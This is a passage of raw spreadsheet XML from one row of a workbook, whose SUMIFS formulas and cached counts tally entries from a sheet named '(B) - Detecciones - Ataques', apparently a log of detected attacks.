      <c r="S55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>28</v>
      </c>
      <c r="T55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>112</v>
      </c>
      <c r="V55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="W55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="Y55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Z55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>579</v>
      </c>
      <c r="AA55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>342</v>
      </c>
      <c r="AB55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AC55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="AD55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AE55" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AF55" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AG55" s="271"/>
      <c r="AH55" s="352" t="s">
        <v>2514</v>
      </c>
      <c r="AI55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>23</v>
      </c>
      <c r="AJ55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>4</v>
      </c>
      <c r="AL55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>107</v>
      </c>
      <c r="AR55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>2</v>
      </c>
      <c r="BD55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>568</v>
      </c>
      <c r="BN55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>10</v>
      </c>
      <c r="BO55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>204</v>
      </c>
      <c r="BR55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>1</v>
      </c>
      <c r="BX55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>8</v>
      </c>
      <c r="BZ55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>1</v>
      </c>
      <c r="CJ55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>6</v>
      </c>
      <c r="CP55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>2</v>
      </c>
      <c r="CQ55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>6</v>
      </c>
      <c r="CU55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>1</v>
      </c>
      <c r="CZ55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>5</v>
      </c>
      <c r="DF55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI55" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ55" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GA3:$GA139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK55" s="271"/>
      <c r="DO55" s="279"/>
      <c r="DP55" s="271"/>
      <c r="DQ55" s="271"/>
      <c r="DR55" s="271"/>
      <c r="DS55" s="271"/>
      <c r="DT55" s="271"/>
      <c r="DU55" s="271"/>
      <c r="DV55" s="271"/>
      <c r="DW55" s="271"/>
      <c r="DX55" s="271"/>
      <c r="DY55" s="271"/>
      <c r="DZ55" s="271"/>
      <c r="EA55" s="271"/>
      <c r="EB55" s="271"/>
      <c r="EC55" s="271"/>
      <c r="ED55" s="280"/>
      <c r="EG55" s="279"/>
      <c r="EH55" s="271"/>
      <c r="EI55" s="358" t="s">
        <v>427</v>
      </c>
      <c r="EJ55" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S32 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK55" s="359">
